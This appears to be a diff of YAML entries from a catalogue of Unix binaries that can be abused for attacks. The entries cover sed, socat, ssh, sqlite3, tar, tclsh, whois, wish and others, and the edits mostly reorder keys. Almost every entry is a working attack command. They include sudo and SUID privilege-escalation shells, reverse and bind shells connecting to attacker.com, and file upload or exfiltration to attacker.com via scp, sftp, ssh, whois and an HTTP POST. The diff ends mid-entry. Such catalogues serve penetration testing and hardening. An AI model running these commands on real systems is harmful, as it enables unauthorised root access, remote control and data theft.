- description: Send local file to a SSH server.
|
||||||
|
code: |
|
||||||
|
RPATH=user@attacker.com:~/file_to_save
|
||||||
|
LPATH=file_to_send
|
||||||
|
scp $LFILE $RPATH
|
||||||
|
download:
|
||||||
|
- description: Fetch a remote file from a SSH server.
|
||||||
|
code: |
|
||||||
|
RPATH=user@attacker.com:~/file_to_get
|
||||||
|
LFILE=file_to_save
|
||||||
|
scp $RPATH $LFILE
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
@ -21,16 +33,4 @@ functions:
|
|||||||
echo "$CMD" > "$TF"
|
echo "$CMD" > "$TF"
|
||||||
chmod +x "$TF"
|
chmod +x "$TF"
|
||||||
./scp -S $TF a b:
|
./scp -S $TF a b:
|
||||||
upload:
|
|
||||||
- description: Send local file to a SSH server.
|
|
||||||
code: |
|
|
||||||
RPATH=user@attacker.com:~/file_to_save
|
|
||||||
LPATH=file_to_send
|
|
||||||
scp $LFILE $RPATH
|
|
||||||
download:
|
|
||||||
- description: Fetch a remote file from a SSH server.
|
|
||||||
code: |
|
|
||||||
RPATH=user@attacker.com:~/file_to_get
|
|
||||||
LFILE=file_to_save
|
|
||||||
scp $RPATH $LFILE
|
|
||||||
---
|
---
|
||||||
|
@ -6,19 +6,19 @@ functions:
|
|||||||
execute-non-interactive:
|
execute-non-interactive:
|
||||||
- description: GNU version only.
|
- description: GNU version only.
|
||||||
code: sed -n "1e id" /etc/hosts
|
code: sed -n "1e id" /etc/hosts
|
||||||
sudo-enabled:
|
|
||||||
- description: GNU version only. Also, this requires `bash`.
|
|
||||||
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./sed -e '' "$LFILE"
|
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sed '' "$LFILE"
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
sed -n "1s/.*/data/w $LFILE" /etc/hosts
|
sed -n "1s/.*/data/w $LFILE" /etc/hosts
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sed '' "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./sed -e '' "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- description: GNU version only. Also, this requires `bash`.
|
||||||
|
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: setarch $(arch) /bin/sh
|
- code: setarch $(arch) /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./setarch $(arch) /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo setarch $(arch) /bin/sh
|
- code: sudo setarch $(arch) /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./setarch $(arch) /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -5,11 +5,6 @@ functions:
|
|||||||
HOST=user@attacker.com
|
HOST=user@attacker.com
|
||||||
sftp $HOST
|
sftp $HOST
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
HOST=user@attacker.com
|
|
||||||
sudo sftp $HOST
|
|
||||||
!/bin/sh
|
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file to a SSH server.
|
- description: Send local file to a SSH server.
|
||||||
code: |
|
code: |
|
||||||
@ -22,4 +17,9 @@ functions:
|
|||||||
RHOST=user@attacker.com
|
RHOST=user@attacker.com
|
||||||
sftp $RHOST
|
sftp $RHOST
|
||||||
get file_to_get file_to_save
|
get file_to_get file_to_save
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
HOST=user@attacker.com
|
||||||
|
sudo sftp $HOST
|
||||||
|
!/bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,17 +1,17 @@
|
|||||||
---
|
---
|
||||||
description: The read file content is corrupted by adding a newline.
|
description: The read file content is corrupted by adding a newline.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
sudo shuf -e data -o "$LFILE"
|
shuf -e data -o "$LFILE"
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- description:
|
- description:
|
||||||
code: |
|
code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
./shuf -e data -o "$LFILE"
|
./shuf -e data -o "$LFILE"
|
||||||
file-write:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
shuf -e data -o "$LFILE"
|
sudo shuf -e data -o "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -1,13 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||||
|
the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||||
bind-shell-interactive:
|
bind-shell-interactive:
|
||||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code>
|
||||||
|
on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo sort -m "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./sort -m "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sort -m "$LFILE"
|
sort -m "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./sort -m "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo sort -m "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,10 +2,6 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: sqlite3 /dev/null '.shell /bin/sh'
|
- code: sqlite3 /dev/null '.shell /bin/sh'
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
|
||||||
suid-limited:
|
|
||||||
- code: ./sqlite3 /dev/null '.shell /bin/sh'
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
@ -18,4 +14,8 @@ functions:
|
|||||||
.import $LFILE t
|
.import $LFILE t
|
||||||
SELECT * FROM t;
|
SELECT * FROM t;
|
||||||
EOF
|
EOF
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||||
|
suid-limited:
|
||||||
|
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
|
||||||
---
|
---
|
||||||
|
@ -4,17 +4,8 @@ functions:
|
|||||||
- description: Reconnecting may help bypassing restricted shells.
|
- description: Reconnecting may help bypassing restricted shells.
|
||||||
code: ssh localhost $SHELL --noprofile --norc
|
code: ssh localhost $SHELL --noprofile --norc
|
||||||
- description: Spawn interactive shell through ProxyCommand option.
|
- description: Spawn interactive shell through ProxyCommand option.
|
||||||
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
|
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
|
||||||
sudo-enabled:
|
x
|
||||||
- description: Spawn interactive root shell through ProxyCommand option.
|
|
||||||
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
|
|
||||||
download:
|
|
||||||
- description: Fetch a remote file from a SSH server.
|
|
||||||
code: |
|
|
||||||
HOST=user@attacker.com
|
|
||||||
RPATH=file_to_get
|
|
||||||
LPATH=file_to_save
|
|
||||||
ssh $HOST "cat $RPATH" > $LPATH
|
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file to a SSH server.
|
- description: Send local file to a SSH server.
|
||||||
code: |
|
code: |
|
||||||
@ -22,9 +13,20 @@ functions:
|
|||||||
RPATH=file_to_save
|
RPATH=file_to_save
|
||||||
LPATH=file_to_send
|
LPATH=file_to_send
|
||||||
ssh $HOST "cat > $RPATH" < $LPATH
|
ssh $HOST "cat > $RPATH" < $LPATH
|
||||||
|
download:
|
||||||
|
- description: Fetch a remote file from a SSH server.
|
||||||
|
code: |
|
||||||
|
HOST=user@attacker.com
|
||||||
|
RPATH=file_to_get
|
||||||
|
LPATH=file_to_save
|
||||||
|
ssh $HOST "cat $RPATH" > $LPATH
|
||||||
file-read:
|
file-read:
|
||||||
- description: The read file content is corrupted by error prints.
|
- description: The read file content is corrupted by error prints.
|
||||||
code: |
|
code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
ssh -F $LFILE localhost
|
ssh -F $LFILE localhost
|
||||||
|
sudo-enabled:
|
||||||
|
- description: Spawn interactive root shell through ProxyCommand option.
|
||||||
|
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
|
||||||
|
-i'" x
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: stdbuf -i0 /bin/sh
|
- code: stdbuf -i0 /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./stdbuf -i0 /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo stdbuf -i0 /bin/sh
|
- code: sudo stdbuf -i0 /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./stdbuf -i0 /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: strace -o /dev/null /bin/sh
|
- code: strace -o /dev/null /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./strace -o /dev/null /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo strace -o /dev/null /bin/sh
|
- code: sudo strace -o /dev/null /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./strace -o /dev/null /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo tail -c1G "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./tail -c1G "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
tail -c1G "$LFILE"
|
tail -c1G "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./tail -c1G "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo tail -c1G "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -5,10 +5,6 @@ functions:
|
|||||||
execute-non-interactive:
|
execute-non-interactive:
|
||||||
- description: This only works for GNU tar.
|
- description: This only works for GNU tar.
|
||||||
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
||||||
suid-limited:
|
|
||||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
||||||
file-write:
|
file-write:
|
||||||
- description: This only works for GNU tar.
|
- description: This only works for GNU tar.
|
||||||
code: |
|
code: |
|
||||||
@ -21,4 +17,8 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
|
suid-limited:
|
||||||
|
- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: taskset 1 /bin/sh
|
- code: taskset 1 /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./taskset 1 /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo taskset 1 /bin/sh
|
- code: sudo taskset 1 /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./taskset 1 /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -4,18 +4,18 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
tclsh
|
tclsh
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
sudo tclsh
|
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
./tclsh
|
|
||||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
./tclsh
|
||||||
|
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
sudo tclsh
|
||||||
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
---
|
---
|
||||||
|
@ -1,17 +1,18 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: 'It can only append data if the destination exists.
|
||||||
It can only append data if the destination exists.
|
|
||||||
|
'
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_write
|
|
||||||
echo data | sudo tee -a "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_write
|
|
||||||
echo data | ./tee -a "$LFILE"
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo data | ./tee -a "$LFILE"
|
echo data | ./tee -a "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
echo data | ./tee -a "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
echo data | sudo tee -a "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -32,5 +32,4 @@ functions:
|
|||||||
./telnet $RHOST $RPORT
|
./telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
|
||||||
---
|
---
|
||||||
|
@ -4,9 +4,9 @@ description: |
|
|||||||
behave differently than` /usr/bin/time`, hence the absolute path.
|
behave differently than` /usr/bin/time`, hence the absolute path.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: /usr/bin/time /bin/sh
|
- code: "/usr/bin/time /bin/sh"
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./time /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo /usr/bin/time /bin/sh
|
- code: sudo /usr/bin/time /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./time /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: timeout 7d /bin/sh
|
- code: timeout 7d /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./timeout 7d /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo timeout --foreground 7d /bin/sh
|
- code: sudo timeout --foreground 7d /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./timeout 7d /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -3,16 +3,16 @@ description: |
|
|||||||
The read file content is corrupted by replacing occurrences of `$'\b_'` to
|
The read file content is corrupted by replacing occurrences of `$'\b_'` to
|
||||||
terminal sequences and by converting tabs to spaces.
|
terminal sequences and by converting tabs to spaces.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo ul "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./ul "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
ul "$LFILE"
|
ul "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./ul "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo ul "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo unexpand -t99999999 "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./unexpand -t99999999 "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
unexpand -t99999999 "$LFILE"
|
unexpand -t99999999 "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./unexpand -t99999999 "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo unexpand -t99999999 "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -1,17 +1,18 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: 'The read file content is corrupted by squashing multiple adjacent lines.
|
||||||
The read file content is corrupted by squashing multiple adjacent lines.
|
|
||||||
|
'
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo uniq "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./uniq "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
uniq "$LFILE"
|
uniq "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./uniq "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo uniq "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: unshare /bin/sh
|
- code: unshare /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./unshare -r /bin/sh"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo unshare /bin/sh
|
- code: sudo unshare /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./unshare -r /bin/sh
|
|
||||||
---
|
---
|
||||||
|
@ -6,15 +6,16 @@ functions:
|
|||||||
vi
|
vi
|
||||||
:set shell=/bin/sh
|
:set shell=/bin/sh
|
||||||
:shell
|
:shell
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo vi -c ':!/bin/sh'
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./vi -c ':!/bin/sh -p'
|
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
vi file_to_read
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
vi file_to_write
|
vi file_to_write
|
||||||
w
|
w
|
||||||
|
file-read:
|
||||||
|
- code: 'vi file_to_read
|
||||||
|
|
||||||
|
'
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./vi -c ':!/bin/sh -p'"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo vi -c ':!/bin/sh'
|
||||||
---
|
---
|
||||||
|
@ -2,11 +2,11 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-non-interactive:
|
execute-non-interactive:
|
||||||
- code: watch /usr/bin/id
|
- code: watch /usr/bin/id
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo watch /usr/bin/id
|
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- description: This keeps the SUID privileges only if the `-x` option is present.
|
- description: This keeps the SUID privileges only if the `-x` option is present.
|
||||||
code: ./watch -x /usr/bin/id
|
code: "./watch -x /usr/bin/id"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo watch /usr/bin/id
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./watch /usr/bin/id
|
- code: "./watch /usr/bin/id"
|
||||||
---
|
---
|
||||||
|
@ -1,7 +1,8 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
upload:
|
upload:
|
||||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
|
||||||
|
Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
|
@ -1,28 +1,34 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: "`whois` hangs waiting for the remote peer to close the socket.\n"
|
||||||
`whois` hangs waiting for the remote peer to close the socket.
|
|
||||||
functions:
|
functions:
|
||||||
upload:
|
upload:
|
||||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
|
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||||
|
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
|
||||||
|
and its length is limited by the maximum size of arguments.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
whois -h $RHOST -p $RPORT "`cat $LFILE`"
|
whois -h $RHOST -p $RPORT "`cat $LFILE`"
|
||||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
|
||||||
|
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file
|
||||||
|
length is limited by the maximum size of arguments.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
|
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
|
||||||
download:
|
download:
|
||||||
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
|
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
|
||||||
|
< "file_to_send"` on the attacker box to send the file. The file has instances
|
||||||
|
of `$'\x0d'` stripped.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_save
|
LFILE=file_to_save
|
||||||
whois -h $RHOST -p $RPORT > "$LFILE"
|
whois -h $RHOST -p $RPORT > "$LFILE"
|
||||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
|
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
|
||||||
|
| nc -l -p 12345` on the attacker box to send the file.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
|
@ -4,14 +4,14 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
wish
|
wish
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
sudo wish
|
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
|
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
sudo wish
|
||||||
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
---
|
---
|
||||||
|
@ -2,13 +2,15 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-non-interactive:
|
execute-non-interactive:
|
||||||
- code: xargs -a /dev/null /usr/bin/id
|
- code: xargs -a /dev/null /usr/bin/id
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo xargs -a /dev/null /usr/bin/id
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./xargs -a /dev/null /usr/bin/id
|
|
||||||
file-read:
|
file-read:
|
||||||
- description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
|
- description: This works as long as the file does not contain the NUL character,
|
||||||
